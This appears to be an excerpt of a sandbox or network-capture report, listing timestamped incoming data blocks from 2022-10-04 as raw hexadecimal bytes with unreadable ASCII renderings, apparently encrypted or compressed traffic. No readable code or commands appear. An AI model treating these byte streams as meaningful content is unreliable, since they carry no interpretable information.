                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC4855INData Raw: e3 d8 46 fe b2 22 c8 4a 55 21 d4 38 c9 19 24 53 c8 64 5d cb df 7f 9b 58 33 19 ff a5 62 d7 54 c2 14 70 b3 ad 2f b1 2e 93 71 d0 f7 9c d2 63 81 6b 3e 5a b1 f8 9e 6c 1c a4 0f d5 df cb 22 ce f9 4d d7 b9 b2 4a 85 8b 21 9f 78 2f 67 02 a9 cd 27 6a 12 46 59 5b d4 9e 4f b2 5f 83 97 aa 83 e8 ef 3a 4e de 8e 66 43 d0 44 c6 74 d7 e7 aa 59 0a 73 3c eb 30 d4 0e 3b 1d 23 f1 37 de 27 ef 3b 0a ef 69 5b dc 2c f3 f1 cf e7 bc 11 b4 4a ea 9a e6 78 45 e7 be 68 3e 61 0c 1c fa 25 a9 d4 19 06 ea 3f 59 0f 2a 65 bc c8 84 f8 59 aa cf 42 9d 5e b5 ae de 71 7f 83 fa 7b 61 a2 a0 3b 30 7a 22 05 ee 07 bf 80 43 58 19 e5 c8 dd 00 6c ea 69 32 c8 92 eb 3b 2d 43 9c f9 23 16 2d 3c 2e 37 d9 9d 18 b6 18 fc 7d 88 43 1f 5b a7 c6 d1 33 68 47 de 04 d1 65 77 06 3b 2f 8a da c8 52 9e 1c 25 7d 54 36 ce ed
                                                                                                                                                                                                                                    Data Ascii: F"JU!8$Sd]X3bTp/.qck>Zl"MJ!x/g'jFY[O_:NfCDtYs<0;#7';i[,JxEh>a%?Y*eYB^q{a;0z"CXli2;-C#-<.7}C[3hGew;/R%}T6
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC4871INData Raw: dc ff ab 30 b0 06 7c e0 e2 cd f7 53 c9 41 6a a6 c2 a1 04 21 db b8 a6 44 59 7f 60 35 1f 52 6f b5 78 11 ba 07 06 5a fa 93 3f 2b c0 e1 9e c6 2b e4 b3 c3 91 b4 18 79 35 4a b6 cd 02 7a 5a a6 38 39 1b 22 de 9d fa b4 0e a0 ef 2b b1 59 98 90 8f 16 40 0e e7 45 b1 66 5a 6d 71 49 c1 1a dd e4 62 51 be 44 1c c3 40 fb 00 06 79 a2 0b 19 ad 3d b7 bc ba ba 01 51 87 ce 99 6e b0 b5 91 c5 ad 88 13 ad 38 29 78 e0 59 ae 26 19 d6 d7 80 2b be cf 5f 05 7b 15 1b c5 3f d6 9d 1f f2 7b aa b6 b5 22 c2 4f b9 00 81 59 8c 13 fb 80 43 aa ed a6 b4 58 99 52 3c 52 e8 80 fa ef fd ba 89 48 3d 54 3b 82 38 39 83 5d c2 54 a4 c9 d7 66 0c 5e 54 1d ce 6e 89 1d ac 1e 93 46 49 20 da 42 9a 3f bd 12 9c 1e 82 e5 41 f3 1f fe fc ea 74 e6 ea 41 35 56 3b 5c 38 45 c0 b9 76 99 8c c5 a4 c3 a0 7e f2 c7 df f0 5f
                                                                                                                                                                                                                                    Data Ascii: 0|SAj!DY`5RoxZ?++y5JzZ89"+Y@EfZmqIbQD@y=Qn8)xY&+_{?{"OYCXR<RH=T;89]Tf^TnFI B?AtA5V;\8Ev~_
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC4887INData Raw: 8e cd 03 d2 a0 9c d8 60 eb 21 ee cc 5a 17 b8 b5 2c 7b 97 ec 09 c6 93 53 31 1d 08 d1 4f c5 ae 69 ad 96 bc 53 39 b2 41 1e 96 8e d7 7d 08 55 f3 c5 12 4b f9 ba d6 9c 11 d6 6e 89 f4 2a eb 11 13 41 ef a1 71 95 35 d0 80 f1 a8 6d 46 48 12 56 41 d9 87 48 f6 7d a7 b1 1e 03 10 e7 d0 76 8d 3c 44 13 19 85 a6 96 ce 8c a4 f9 4d e7 e0 77 ef f2 5f c0 e7 06 5c 5f 6a 82 58 c3 57 ad 11 a9 4e 31 3a 79 c2 26 2f 82 72 6e bd f7 89 6c 78 14 84 c7 47 e1 d1 20 27 64 f8 49 ef 51 21 b6 3c b2 2d 67 ae 92 45 8c de 79 31 b2 9a e1 77 dd c6 93 2b 1b 4d 15 ee dc 4c 6c 6e 4f bd 4a 27 28 77 be ea 23 70 50 c9 89 d5 ad c8 7c da 8f d9 2e e6 61 e9 4b 85 49 13 10 4b 1a 41 50 56 e6 aa 86 54 b9 cf 22 6a 22 57 6d 85 a9 31 dd e2 68 df 47 f7 18 33 93 84 73 c9 4f 96 85 b9 73 77 fd ef e5 f2 c2 c6 d2 45
                                                                                                                                                                                                                                    Data Ascii: `!Z,{S1OiS9A}UKn*Aq5mFHVAH}v<DMw_\_jXWN1:y&/rnlxG 'dIQ!<-gEy1w+MLlnOJ'(w#pP|.aKIKAPVT"j"Wm1hG3sOswE
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC4903INData Raw: 9c db d3 37 ec 43 d1 45 23 b5 dc 49 9f 4f 3f 4d 16 81 7a 5e 95 8c c0 20 11 a6 35 51 36 83 10 e8 ba b4 4f 3f 66 11 03 7e f1 d8 45 05 86 c1 b6 f5 f1 b8 b5 5e 3a ca 1d 44 16 96 69 51 c1 a9 e7 a9 aa 32 4a 96 b4 7c 34 5b 92 b1 10 8e c5 fb b5 37 f7 16 c9 61 e7 b0 41 80 90 99 e4 fd 9a cc b6 8c 2e 00 e1 f5 b6 e1 88 4b b1 65 54 1d 51 5b 73 5d 01 20 24 f0 84 f3 a6 94 70 10 f1 ce da aa a0 06 60 c3 cf 1a 17 b6 02 73 11 f4 90 e2 4b 49 cd 44 11 e5 54 f1 72 af e6 bd 90 4a 74 29 27 3e 59 5c 6c 16 05 cf 3b 36 0e 94 c9 b9 8c 69 78 fc f0 21 f4 9c d2 d8 d3 da 35 79 72 dc 80 87 98 05 d4 ca c1 b6 3c a1 dc d0 8f f4 d7 c8 9d 3b 39 98 08 bc 41 1c 27 4c 96 a3 74 d7 e8 c0 89 60 e4 8f 08 7a 4e 43 9a 40 b4 66 f9 30 4f 2a 34 b9 0f 5e b0 9f e8 b3 95 b0 56 95 4d d1 b8 0d c2 a6 74 1b bc
                                                                                                                                                                                                                                    Data Ascii: 7CE#IO?Mz^ 5Q6O?f~E^:DiQ2J|4[7aA.KeTQ[s] $p`sKIDTrJt)'>Y\l;6ix!5yr<;9A'Lt`zNC@f0O*4^VMt
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC4919INData Raw: bf 80 c9 97 08 e3 73 d3 0c 6d 6a e4 9f 61 8f eb 51 89 a1 ff 4e 5c 7a 31 00 3a a8 d0 4c 74 ca 84 15 41 b2 a5 73 0b f4 85 0d 97 ab 4c 83 7f 84 a6 ed 63 7f 31 24 d9 62 ab 23 55 54 0b a7 27 62 7d a2 7a 71 38 8e d9 b5 ee 37 06 e9 93 61 b7 13 2c 53 ee 0e 08 9d 49 56 92 91 1e 4a df 25 fb f7 99 ab 6d 61 80 ff 9b 34 f8 4f 1a 57 5e 2e dc c5 26 4f c5 36 1c 76 17 cb fb 39 7f 41 7b 98 bf 7d 19 40 3b d3 63 7b 5b 00 57 7c 63 cd 37 d2 8b 3f 90 43 75 f1 21 d6 be 53 df 61 b6 c2 8b b7 bc 58 22 06 ca 0a 51 a4 aa 72 94 d1 18 b1 7b 2d f5 10 e4 35 13 28 a9 21 9e 62 f4 59 bb 0b 4f 29 2a b9 03 9a d7 5c 70 20 45 83 f2 d7 3a 3a cc 92 02 15 cf bf 5c 37 73 8f c6 ec 68 b5 00 e6 c4 25 41 ca 57 07 54 7a 55 38 72 dc f9 57 b8 35 e2 c6 70 be 8f bd 23 7e b5 8d 4f 9a 47 a8 9c aa e4 62 d9 3e
                                                                                                                                                                                                                                    Data Ascii: smjaQN\z1:LtAsLc1$b#UT'b}zq87a,SIVJ%ma4OW^.&O6v9A{}@;c{[W|c7?Cu!SaX"Qr{-5(!bYO)*\p E::\7sh%AWTzU8rW5p#~OGb>
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC4935INData Raw: 85 ba 1c b0 c4 48 13 54 4f e1 26 0d e3 ae 20 74 21 1d 96 bf ff 06 fe af c6 54 57 d7 cd 25 44 48 a0 0f 77 d8 a1 f6 8b a0 bf 05 7a a3 cc e5 92 f5 50 cb 8a 4b e0 9f 38 4b 25 c3 3b ce c9 c1 9f 3a 46 32 94 2e c0 60 50 84 b2 83 f3 94 d0 43 97 07 7a ad ad 01 44 49 5f 1e ae a2 9d 69 f0 43 9a cf ec 56 20 88 7a 25 17 29 13 86 50 ab 3b d4 4c fe c7 bd c9 fa a7 8c 25 c3 04 0a 24 80 56 36 33 f3 45 9e 65 a2 e3 27 c5 bb 71 65 a7 2d c4 f9 e1 a4 2c d9 d3 44 bd 98 58 53 80 57 4b d0 2a bb 6f 3e ea c5 22 d2 f0 2b 4b 5a 83 3c b9 97 ee 0b e3 44 be fb 81 25 a0 da ad 91 23 b2 72 c3 68 9b 66 16 6b fe cc 98 50 84 bd 04 3e 0a 55 56 0f 72 c2 c0 54 6b b7 4c 0a 37 d3 e0 28 c5 df 8d 10 5a 26 6d 3b 8f 39 56 32 74 45 db 34 59 58 41 d8 45 99 45 a3 39 73 3d 78 d6 23 f3 10 86 2c ca bb c5 b2
                                                                                                                                                                                                                                    Data Ascii: HTO& t!TW%DHwzPK8K%;:F2.`PCzDI_iCV z%)P;L%$V63Ee'qe-,DXSWK*o>"+KZ<D%#rhfkP>UVrTkL7(Z&m;9V2tE4YXAEE9s=x#,
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC4951INData Raw: 05 68 03 05 e8 0f 08 b7 bc 7c 2f d0 b9 00 62 83 37 31 25 d2 dd cf b0 ad 34 11 8f 0c 0a 3c 4c 18 b4 07 cf e8 27 83 30 6d 8d 2b 79 85 0a 14 62 fe 58 29 f1 d7 ab 93 fc f7 62 cb 09 ea 21 e7 f2 d2 b7 45 65 c8 98 e1 06 14 01 ec de 0e c7 a0 31 f9 b9 52 05 d7 ab 31 07 cc f6 fd aa 78 14 4c c4 e0 f0 f3 5d 7a 22 88 47 9a ef 15 a9 32 45 7f 6f 0a a4 44 4b 58 e9 36 5d 52 48 fd a9 9d 24 48 2d 5b 91 e3 0c 25 7f 87 1e 5a 65 34 38 29 51 ba 01 43 ae ed d4 b3 bc 08 83 19 b0 2e 53 23 8f 21 e8 c3 d8 b8 45 58 f4 74 73 90 c0 9e c0 4a d8 63 8b 49 b7 c5 dc 5f 8f c2 19 70 a8 03 d5 9d 56 09 bc 05 20 db 30 6a 1e cf 03 4b 34 33 f5 fb 53 4c aa 1f f4 8f b3 8b a5 95 1b ec 4a 32 b2 26 7a 4e 22 cc c1 34 da 18 b8 a7 e7 3e 7a 41 d3 f1 d1 9d 25 41 f7 4d 31 19 1a 1b 2f 6e 28 13 1b 40 56 d1 06
                                                                                                                                                                                                                                    Data Ascii: h|/b71%4<L'0m+ybX)b!Ee1R1xL]z"G2EoDKX6]RH$H-[%Ze48)QC.S#!EXtsJcI_pV 0jK43SLJ2&zN"4>zA%AM1/n(@V
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC4967INData Raw: 1a 9e ae c8 ba 99 d4 ae a4 45 12 86 86 a1 b5 b8 8b bf b4 d6 9e dd d8 31 4d fc 83 2d 8a bd d3 dc 31 5c 91 a2 21 94 dd b3 05 90 20 a9 1b 5e db 8e fd 17 dd 30 6b 40 31 75 09 e9 a1 78 1c 49 91 30 0b c3 17 e5 82 97 a7 a8 d6 ac fc cf 2a 74 23 54 dc d6 f1 ca d4 46 d3 be 4c 79 b0 19 9b 45 a6 74 ec 58 30 dc 9b a6 4c 27 4c 00 b7 3f 7c 51 53 62 78 f4 6f 6e 67 19 e1 8c d2 6b 08 70 9f a6 24 f5 b7 29 41 cd 56 d0 11 c7 74 bf 2a 62 8c eb fc b9 44 81 7c 4f b9 f8 f0 35 3e 35 1c 31 f8 be 51 6d da 24 55 c4 37 71 9e c6 41 88 21 cd 97 17 7e 75 65 56 83 b5 a3 52 bd 86 eb 4e 8f 05 42 79 8e e7 3e f5 7a cc 7c 5f d8 0a a3 e2 55 99 40 a6 7d 02 29 52 d1 25 c5 58 ce 19 3e 51 f4 c1 c9 9e 48 71 81 50 63 e1 d0 17 89 15 9f c0 53 67 3a 63 36 f6 e9 4f 02 0e b7 c6 95 f0 d2 2b 0e 67 e4 b4 d0
                                                                                                                                                                                                                                    Data Ascii: E1M-1\! ^0k@1uxI0*t#TFLyEtX0L'L?|QSbxongkp$)AVt*bD|O5>51Qm$U7qA!~ueVRNBy>z|_U@})R%X>QHqPcSg:c6O+g
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC4983INData Raw: 8e 84 5d 31 c3 a8 be df eb 4b fe 6c 31 79 ec 5a d6 9c 8e 26 37 9c b8 e6 5f e8 47 39 64 77 f5 b6 3c 3d 2d c9 77 e5 53 0a c6 1d 97 27 1d 19 4e 0f bb db 36 51 bf 93 3a ac 78 de b2 13 58 5f 44 71 23 9a 32 97 75 c2 18 89 bc db b0 59 a9 cf 02 3c 6e 88 c9 cf 28 0c 1f 18 05 09 36 4f db e6 ee 60 74 86 96 c0 1b f8 ce b1 85 63 aa 8d 4f 29 cf 78 cf b0 12 56 c7 09 2d 5c 96 af ce ae ef 1b 3f 29 08 ad ac 48 1e 26 e6 e3 4e db d8 e2 0a 98 2f 94 24 f7 f2 7c 99 60 48 2a 46 bb d2 a8 b7 82 27 45 bf ae 28 e4 82 77 86 c0 57 3d f7 e0 c2 52 e2 8d 37 22 7c 34 c9 28 73 cf 4e 6c a0 4a ec b8 4e 22 34 a5 04 de f6 9f 1e 9d 47 39 40 f1 22 44 45 e1 f0 bf b7 c1 8e ef 56 c8 01 f8 a7 d9 1a 7b 40 28 21 75 d7 56 b2 26 fc c8 7a e0 36 55 6d f6 d1 9f d4 9c 74 ed fa fe 3b 39 ce 63 1f a3 e2 72 72
                                                                                                                                                                                                                                    Data Ascii: ]1Kl1yZ&7_G9dw<=-wS'N6Q:xX_Dq#2uY<n(6O`tcO)xV-\?)H&N/$|`H*F'E(wW=R7"|4(sNlJN"4G9@"DEV{@(!uV&z6Umt;9crr
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC4999INData Raw: 83 a1 62 f6 5c d7 2d bd c1 71 0a 9e 81 7e 42 e2 ab 3a 1d 66 37 61 43 26 47 f1 43 bc 50 ff bf e3 89 85 7a 93 c0 ef 90 88 bd 5d 55 38 95 8c 2b f7 72 fc 46 00 ac 92 a0 5a cb d0 cd 8f 38 46 b8 7b d6 dd f8 79 61 28 01 e4 c4 66 9b 2a d9 34 1e 80 16 33 b8 0b 72 f1 7c 93 47 06 9c 97 15 96 b9 e7 30 0f 3d 53 e1 79 98 d9 ee 2f 03 20 68 59 6f be 74 4e f9 2d a4 99 99 2a cc 45 96 a2 73 20 15 0e 31 b1 c1 ea 92 18 c2 1b 20 48 e3 51 dc 6a 05 e0 4e 93 31 26 67 79 27 c0 8f ab a8 93 99 10 95 d9 c1 b1 70 61 25 d7 ab 66 d7 92 0d 87 f0 ba 73 e8 55 45 aa 84 d8 7f 69 95 f4 19 52 18 85 ca 4f c5 ba a5 b4 72 dc 54 32 6e 02 e8 51 9e 1b bb 29 50 5e a3 63 36 41 d4 50 ea c9 1b 7e f2 0c 41 33 b9 03 40 f6 8d 31 51 a8 12 32 b0 4b 03 90 a5 9b 05 b1 58 dd 54 c0 84 1a 97 11 a4 53 3c f8 59 01
                                                                                                                                                                                                                                    Data Ascii: b\-q~B:f7aC&GCPz]U8+rFZ8F{ya(f*43r|G0=Sy/ hYotN-*Es 1 HQjN1&gy'pa%fsUEiROrT2nQ)P^c6AP~A3@1Q2KXTS<Y
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC5015INData Raw: c1 49 2c 34 2a 09 87 7a e7 66 1b 18 3e 01 3a 06 60 6b c6 cd a5 04 5a 52 8f de 55 4d 86 2b 91 89 04 a8 54 c0 c0 62 30 90 6b 53 7a 75 91 48 59 da 43 88 5c 80 55 69 01 4a f7 d1 8e ab 45 bd d7 bb c5 5c e9 5d e3 7e 9a 76 ad c9 53 43 a8 32 73 43 d4 8b 57 9e 2d 5f 18 b4 85 3b af 62 4b 59 68 1c a2 4a 89 be 4c e7 a2 e5 0d 9f 9d 30 b1 a6 ce ac 6c 3c ad b8 59 46 cd f3 7d 3f 31 e5 85 d6 27 25 43 c2 09 64 87 bd 87 7b f3 80 31 e0 0d 4f 4f ba 26 7f e1 d4 53 a2 90 d2 cb 71 58 90 71 54 29 b3 09 f1 83 6e 1b 7f 2a 0c 5b 5e 34 3d bd 20 80 33 2b 04 12 36 07 2a 6f 75 0c 22 dd 55 a5 9d 55 93 d4 fe f5 09 b1 91 bf f3 8d 65 41 61 8b 95 cc 5e 71 1b 51 b1 61 32 9a 5f f3 45 e5 bd c0 3d 3a 56 9a aa 32 41 02 9f 7e a3 70 28 5e 15 b7 1b 4d af 27 40 15 94 bb 4c f2 b5 7b 3e 5b 81 d1 95 fd
                                                                                                                                                                                                                                    Data Ascii: I,4*zf>:`kZRUM+Tb0kSzuHYC\UiJE\]~vSC2sCW-_;bKYhJL0l<YF}?1'%Cd{1OO&SqXqT)n*[^4= 3+6*ou"UUeAa^qQa2_E=:V2A~p(^M'@L{>[
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC5031INData Raw: 7c 3f 32 53 16 c3 1b 2d 3e 84 57 fd 2d c9 af c0 37 09 57 94 12 fc 76 5a 79 6c 3b a8 0a c8 72 46 5b d8 1f c3 ff b4 28 3a 1d cc fb 1b 37 eb c0 6c ff 5c ab 64 e8 2a 53 1c ad 63 69 35 5a fe f8 2c b4 9e 62 e7 87 07 3b 2b bf a5 5a 57 22 96 73 87 52 93 a8 2c bb c9 93 cd 20 d9 92 99 84 47 e1 5a e5 31 74 a8 c2 29 45 c5 9e 48 ab da a9 35 6c f9 f9 ca 75 a7 80 9e b6 2f 7b 88 1b f9 8a 38 d0 dd 61 c5 69 1e 38 32 72 8d e3 1b e3 9a 5e 23 91 ff ab ef 2d 8f 06 7f 04 3c 24 32 80 c1 bc b9 f5 38 61 47 d2 ca 43 66 87 b0 36 04 5b d8 7b cb 66 2b 5e 60 f7 ca 1f 42 2a d3 4c 9e 17 a2 e3 f3 1d 72 4f f4 be 7c 02 45 c3 25 cc d5 06 6a b9 30 68 fb cb f1 8a 44 72 ee e2 90 4c 2d 8c 6b 20 5e f5 24 7f d2 be ef 1d c3 45 9e d6 7d d2 14 75 c7 6d bf f8 dc 55 be 05 00 4c 76 61 6c de 92 ea ee 4d
                                                                                                                                                                                                                                    Data Ascii: |?2S->W-7WvZyl;rF[(:7l\d*Sci5Z,b;+ZW"sR, GZ1t)EH5lu/{8ai82r^#-<$28aGCf6[{f+^`B*LrO|E%j0hDrL-k ^$E}umULvalM
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC5047INData Raw: 91 33 d2 be 44 40 b3 12 b5 f6 a8 14 cf e5 37 4b a7 bc 2f e6 f4 4f f7 79 84 6e cd f5 25 dd 84 e5 1a fa 01 9b c2 3d b9 c4 4b 22 65 67 65 0e 33 bf f9 4b 8e dc 32 72 87 6d ef 79 b9 9d fe 00 8b d0 e2 11 17 a2 ee 5b 05 fa 52 fa 16 ed d7 c5 fb 25 c1 ae cf 19 c6 ef 69 e4 ce 50 e4 d0 b2 d3 8d 1f f3 4a 7e 84 c1 ed 80 ab f7 e8 d3 3b 72 6c 8d 82 07 3d 97 c3 ca cd 91 d3 fa ae bf 20 92 1f da c8 7e 50 5a 25 1f 8d cb 00 ff 0c 48 2c d0 32 92 37 66 d1 6b fa 24 0e f6 2c e4 a1 16 26 6f a2 2c a2 16 22 bc 82 59 a9 ae de 94 f1 43 bf fb c9 e1 38 cd d7 19 13 5e d9 8e 13 07 09 ca cf c9 04 43 ee f4 78 18 3f 69 59 b9 e7 f5 82 ac d9 21 4e c5 87 c0 c7 62 a6 d5 78 49 8e 05 30 44 b1 6c 5c 0c 88 e6 89 88 20 0c c3 4d 12 98 8f 18 b5 13 04 06 9c 30 57 c2 22 dd 97 e0 a4 05 b7 a9 f5 4c 03 19
                                                                                                                                                                                                                                    Data Ascii: 3D@7K/Oyn%=K"ege3K2rmy[R%iPJ~;rl= ~PZ%H,27fk$,&o,"YC8^Cx?iY!NbxI0Dl\ M0W"L
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC5063INData Raw: 74 70 ae a8 94 54 89 ac 99 14 d1 93 50 e6 1c b5 25 fd d7 4a a0 64 17 d2 56 12 c8 8f 30 91 bf 0d ec 67 09 8f eb c8 eb 2e 98 29 04 dc 5c 4d 5b 69 4a dd af a7 d2 48 17 4c b6 9c d8 2a 11 e2 b8 15 ce f4 9c 62 9d 07 de d5 c8 f1 5f 59 98 40 7b 8d 29 49 84 d7 fc df d9 9e 16 d1 ce d1 08 59 ac 9b 3c 92 c6 56 bc 98 2f 16 bd bf 20 91 0f a7 83 01 14 94 3b 2b 6c bf 45 4d ec 36 8c f0 97 90 2e b4 9f 4a a0 68 f5 ed b3 08 df 57 42 6a 88 71 62 8a 69 7c d3 4c 41 a9 9f eb ee 0a ba 7e 00 cc ab 05 29 f7 32 0b cb f9 9f 91 47 d5 91 d5 eb eb 9c b8 69 d0 d7 19 38 11 fc f6 06 29 5f ee 6e 2a f3 b6 e4 27 46 ca e1 7c 62 80 ab 7a fa ef 3c 73 88 44 bb f9 32 50 da 1a 10 ba af 8e 9e d6 39 38 0f 9d 92 41 15 da d8 de 7b c8 b4 df 77 8f 71 50 a1 84 07 c2 1a a3 6c 25 12 ef 9a 4d d3 de 5e f4 a5
                                                                                                                                                                                                                                    Data Ascii: tpTP%JdV0g.)\M[iJHL*b_Y@{)IY<V/ ;+lEM6.JhWBjqbi|LA~)2Gi8)_n*'F|bz<sD2P98A{wqPl%M^
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC5079INData Raw: 73 ca 8f 1d 58 10 7f e7 3b 5a f3 76 bd ce 74 b1 2b e1 68 dd a4 79 81 54 64 6f 3e 0f 76 52 5b 90 ab dd 7b f8 cc 46 bc e5 6b 55 45 07 27 a2 4b 27 50 b5 7e 02 bb 87 8d b9 de 22 55 53 88 f4 b1 51 15 11 58 2a ba 66 b1 64 08 d0 6b 38 d2 ac be c0 66 ef 4b 5a 22 8a b0 f8 a9 83 3c d5 d5 7e a4 31 e0 11 47 4f 64 2c 7c 38 8e be 97 5f 06 a0 e5 7e 63 41 ad fa 4d ea 54 9f 1d 4e 40 2e ae ed 2b 04 fe 9c 10 bd 26 7f 5c b3 9f bf 3f 11 53 d2 19 fd 47 0d ca 2e ba 42 10 6c 73 c7 69 31 a1 1c 79 cf ad 65 15 f2 9a 9b 98 d4 87 1c 56 17 82 50 35 d7 d3 7e cc 1c 9f 7f f7 85 ee 51 29 ac 7c 4b f2 70 44 63 82 c3 2d bf 4f c0 96 84 9c 41 0f f7 be e4 ef 96 3e a4 2a a2 08 aa 26 fb f0 f9 2f 24 0f 03 57 14 64 5b 70 b8 3c a5 57 9e d9 40 61 fd f9 c0 9f b0 65 c6 aa f2 61 d9 f3 33 08 c6 51 07 1a
                                                                                                                                                                                                                                    Data Ascii: sX;Zvt+hyTdo>vR[{FkUE'K'P~"USQX*fdk8fKZ"<~1GOd,|8_~cAMTN@.+&\?SG.Blsi1yeVP5~Q)|KpDc-OA>*&/$Wd[p<W@aea3Q
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC5095INData Raw: 41 ee c8 d8 61 b1 39 cc cc f1 27 e2 b0 5d 4e 00 ee f7 4b d0 96 be 0b 44 49 21 0b 6c 7f 67 a2 ed 6d 13 85 c4 6e 6b da ff c3 13 41 d7 63 13 ef 51 69 df 87 4a 92 6a 6b 41 28 9a c7 0a 50 0b e6 c5 3b c2 3e 94 4b 93 51 e9 05 0a f1 ab a9 8b 0f b9 49 b9 5c 59 fc 0d c9 40 aa ff bd 6d 3f 2d 44 9a 0f bf b6 39 de e5 5d 72 1c fb 95 df b7 30 c1 2a d2 4b f5 71 71 01 eb 06 ed a3 ec 19 7f 2b 57 74 6d 5a d2 07 ce 7c 5f 59 02 b5 91 6b 63 3a d0 14 de 9b 9a 09 1b 8e a7 da 97 75 9e 04 78 01 e2 71 e2 39 cf 0a c6 7c 7b 80 65 3e 07 3e f1 c3 06 fd dc 66 9e 28 7d 23 36 0f 88 e4 f6 21 d3 c5 de e8 90 b1 e6 5a 2d f6 bd 74 ac 89 b5 b1 07 35 be 33 87 49 59 39 48 ce 3b 2f f5 3b 37 84 9c 09 76 d8 bd fb bc 6e 63 6b 26 84 15 de d9 b8 ea d1 b7 0c 7b 23 9b 76 bb 99 ae 75 fc ee 35 07 27 64 95
                                                                                                                                                                                                                                    Data Ascii: Aa9']NKDI!lgmnkAcQiJjkA(P;>KQI\Y@m?-D9]r0*Kqq+WtmZ|_Ykc:uxq9|{e>>f(}#6!Z-t53IY9H;/;7vnck&{#vu5'd
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC5111INData Raw: 84 9c 5f a9 70 75 94 72 7c 29 e9 18 16 89 03 36 f2 0c c4 24 bb 37 d4 8c 4f f9 ab b9 e7 50 be 3b 94 48 e8 1a e1 16 d5 02 2c 21 b9 52 f6 6b 8c 26 f3 5f 5c 9d 54 5d 5b 8b 3d 74 0c 68 e2 79 e4 f0 f6 ec 6d 8a dd f3 65 7f 1b 5f a8 c9 17 8c 58 2b a0 33 61 8e 6f 9b 6e 43 e1 a0 96 ef 1b b5 b1 ac 4c 27 94 8a ea 09 53 8e 85 71 48 12 b0 6c 16 f4 bf 3c c2 a5 19 8e 8f 15 65 27 16 36 67 4b 89 d2 e5 66 5a 30 fc 0a b1 35 04 fd 25 86 43 72 0f 5c bb e8 4d b3 28 3a 1a 90 bb 26 ea 91 05 a5 9d 05 9b e0 7e 7e da 10 ab 3e 07 22 bc 68 8e a3 4d d1 e1 c4 42 1f 1a fd dd fc 63 37 2d fc 3a b1 14 78 3a a0 67 55 5c 76 b9 15 f7 c4 b1 24 6b 5f f2 a3 30 c4 0e 90 0f a1 35 16 16 d4 6d d4 66 91 fa 56 39 42 f7 21 d8 d4 36 08 19 a1 d4 48 38 09 f4 47 83 bb 89 f7 bb 6b be 82 77 f0 5e 6a 18 b6 d5
                                                                                                                                                                                                                                    Data Ascii: _pur|)6$7OP;H,!Rk&_\T][=thyme_X+3aonCL'SqHl<e'6gKfZ05%Cr\M(:&~~>"hMBc7-:x:gU\v$k_05mfV9B!6H8Gkw^j
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC5127INData Raw: 2c a8 9d 21 fc 57 94 fc 21 f2 4d a9 96 5e 75 93 ea b9 54 c7 6c 50 84 89 48 7c 15 22 8f 89 49 ed 03 82 04 cb e3 77 8a e8 10 62 9e e3 4b 5d a2 e3 4b 3a 9a 88 3b 07 2e ff 77 23 1a f8 e5 f5 2d 2d 40 f0 98 bd f0 1f 1e 37 4d 37 35 7e 9f 7d 79 16 c6 53 a3 8b 65 fe de 9a 85 dc 46 18 0f c9 8d a4 eb 85 30 44 36 e2 1c a0 f2 4f 56 07 f1 d1 e2 7d 4f 5f 82 94 50 a8 61 b3 c0 ff b3 fb 25 5a 88 c0 13 87 90 6e 1f a1 a0 9b 0a 59 51 c0 25 c3 67 52 49 f3 4f a4 6b a5 c5 70 22 bf 72 cc 98 d1 2b 39 61 3a 90 15 45 7a 08 a4 eb 85 4b 1b b1 65 c3 e1 6b 48 22 7d 3a 3a 5f f2 fd b6 4a 1f 54 c5 f8 fc 81 2e 5f e5 e9 22 c7 5b 4d 32 50 b9 d1 e1 25 0d e0 d0 85 16 c2 91 69 8d 61 5b 03 fc ef a6 ce 7e a2 b0 07 70 3f c0 33 e4 b2 e5 61 4e 50 7a eb e6 e1 67 5b aa aa cb bd 9a 1a ca ba ab 06 d2 58
                                                                                                                                                                                                                                    Data Ascii: ,!W!M^uTlPH|"IwbK]K:;.w#--@7M75~}ySeF0D6OV}O_Pa%ZnYQ%gRIOkp"r+9a:EzKekH"}::_JT._"[M2P%ia[~p?3aNPzg[X
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC5143INData Raw: ea 43 06 05 a8 b6 c9 3f 99 cf 2c e3 fd f2 e7 c3 99 e1 11 f0 1e 4a d8 fc 2e 59 cb 35 bf 0c 44 2e 89 64 0c a1 4c 22 5e 6c 37 fb 6b 66 db 59 a5 1b d9 d8 58 de 24 d2 94 01 cc 79 48 a4 a6 a8 bb a2 a3 84 c2 46 93 ce b1 eb cf 66 94 08 c9 8f ff 37 a8 28 a6 46 b8 fb 8d 23 c8 bc f1 9d 69 ee 00 69 7c cf 81 a1 fe ed a1 7e 8a 07 09 d6 29 be c8 ab 87 37 5e 7d 7c 28 26 e0 35 e3 42 41 d2 f8 2c 2e 45 d6 7a b4 95 e5 2a 75 f9 1a e3 79 1e 9c 89 c9 20 c3 50 cf 7e 25 43 52 c3 b6 df 4d 25 90 04 44 1b 4b 29 77 fb f8 05 02 c6 ad f8 a3 33 48 04 06 de 7e 76 89 22 61 b8 03 a8 05 05 30 13 76 44 1c 98 e2 3c 9b 1e 05 b5 a7 47 c3 47 7a 85 b8 26 d6 8a 31 eb bf 30 59 d2 a8 5b 13 b8 67 6e 9a 24 c3 12 0c ff 78 af 47 02 01 ae 1c bc b6 ac c9 6c 63 63 43 2b 68 7b 6e be 51 0e a4 27 f1 98 1e c6
                                                                                                                                                                                                                                    Data Ascii: C?,J.Y5D.dL"^l7kfYX$yHFf7(F#ii|~)7^}|(&5BA,.Ez*uy P~%CRM%DK)w3H~v"a0vD<GGz&10Y[gn$xGlccC+h{nQ'
